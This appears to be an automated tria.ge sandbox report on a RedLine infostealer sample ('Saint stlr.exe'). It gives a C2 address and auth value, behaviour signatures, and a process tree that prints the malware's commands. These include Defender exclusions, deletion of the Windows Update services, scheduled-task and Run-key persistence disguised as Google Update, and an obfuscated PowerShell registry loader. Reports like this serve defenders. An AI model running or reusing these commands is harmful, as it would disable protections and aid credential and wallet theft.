Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    96s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/11/2022, 19:58

General

  • Target

    https://oxy.st/d/mshg

Malware Config

Extracted

Family

redline

C2

62.204.41.141:24758

Attributes
  • auth_value

    2af7880ab63d81985344016656f9ca9b

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Stops running service(s) 3 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://oxy.st/d/mshg
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff3e1a4f50,0x7fff3e1a4f60,0x7fff3e1a4f70
      2⤵
        PID:1648
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1700 /prefetch:2
        2⤵
          PID:4848
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4900
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2284 /prefetch:8
          2⤵
            PID:3156
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
            2⤵
              PID:4248
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
              2⤵
                PID:3124
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
                2⤵
                  PID:3844
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
                  2⤵
                    PID:3512
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                    2⤵
                      PID:1464
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
                      2⤵
                        PID:1924
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                        2⤵
                          PID:1992
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5080
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
                          2⤵
                            PID:2936
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3260 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3228
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:8
                            2⤵
                              PID:3176
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5796 /prefetch:8
                              2⤵
                                PID:1036
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4608 /prefetch:8
                                2⤵
                                  PID:2304
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:8
                                  2⤵
                                    PID:3964
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
                                    2⤵
                                      PID:5004
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:8
                                      2⤵
                                        PID:4436
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:1
                                        2⤵
                                          PID:4624
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2616
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1924
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5092
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                                          2⤵
                                            PID:208
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
                                            2⤵
                                              PID:2156
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
                                              2⤵
                                                PID:3544
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
                                                2⤵
                                                  PID:744
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6448 /prefetch:8
                                                  2⤵
                                                    PID:4340
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:8
                                                    2⤵
                                                      PID:1480
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:8
                                                      2⤵
                                                        PID:4548
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6336 /prefetch:8
                                                        2⤵
                                                          PID:3924
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
                                                          2⤵
                                                            PID:3360
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
                                                            2⤵
                                                              PID:4540
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
                                                              2⤵
                                                                PID:4392
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:8
                                                                2⤵
                                                                  PID:1692
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6060 /prefetch:8
                                                                  2⤵
                                                                    PID:3796
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6756 /prefetch:8
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3448
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4952 /prefetch:8
                                                                    2⤵
                                                                      PID:3328
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
                                                                      2⤵
                                                                        PID:1748
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                                                                        2⤵
                                                                          PID:4560
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5984 /prefetch:8
                                                                          2⤵
                                                                            PID:2268
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6200 /prefetch:8
                                                                            2⤵
                                                                              PID:724
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,11065652544949086893,11031076741222045380,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 /prefetch:8
                                                                              2⤵
                                                                                PID:3048
                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                              1⤵
                                                                                PID:1748
                                                                              • C:\Windows\System32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                1⤵
                                                                                  PID:832
                                                                                • C:\Users\Admin\Desktop\Saint stlr.exe
                                                                                  "C:\Users\Admin\Desktop\Saint stlr.exe"
                                                                                  1⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3436
                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\brave.exe
                                                                                    "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4344
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                      3⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3772
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                      3⤵
                                                                                        PID:5104
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop UsoSvc
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:4080
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop WaaSMedicSvc
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:436
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop wuauserv
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:2100
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop bits
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:4292
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop dosvc
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:3104
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                          4⤵
                                                                                            PID:996
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                            4⤵
                                                                                              PID:3728
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                              4⤵
                                                                                                PID:3888
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                4⤵
                                                                                                  PID:1692
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                  4⤵
                                                                                                    PID:3056
                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                  3⤵
                                                                                                    PID:3456
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      powercfg /x -hibernate-timeout-ac 0
                                                                                                      4⤵
                                                                                                        PID:1320
                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                        powercfg /x -hibernate-timeout-dc 0
                                                                                                        4⤵
                                                                                                          PID:2664
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          powercfg /x -standby-timeout-ac 0
                                                                                                          4⤵
                                                                                                            PID:1404
                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                            powercfg /x -standby-timeout-dc 0
                                                                                                            4⤵
                                                                                                              PID:3360
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                                            3⤵
                                                                                                              PID:1940
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                                                                              3⤵
                                                                                                                PID:4656
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                                                                  4⤵
                                                                                                                    PID:4716
                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                  C:\Windows\system32\dialer.exe
                                                                                                                  3⤵
                                                                                                                    PID:1436
                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1892
                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                    "cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                                                    3⤵
                                                                                                                      PID:5036
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                                                        4⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:3448
                                                                                                                • C:\Users\Admin\Desktop\Saint stlr.exe
                                                                                                                  "C:\Users\Admin\Desktop\Saint stlr.exe"
                                                                                                                  1⤵
                                                                                                                    PID:4036
                                                                                                                  • C:\Users\Admin\Desktop\Saint stlr.exe
                                                                                                                    "C:\Users\Admin\Desktop\Saint stlr.exe"
                                                                                                                    1⤵
                                                                                                                      PID:1400
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                                                                                      1⤵
                                                                                                                        PID:920
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                                                                                        1⤵
                                                                                                                          PID:724
                                                                                                                        • C:\Program Files\Google\Chrome\updater.exe
                                                                                                                          "C:\Program Files\Google\Chrome\updater.exe"
                                                                                                                          1⤵
                                                                                                                            PID:4792
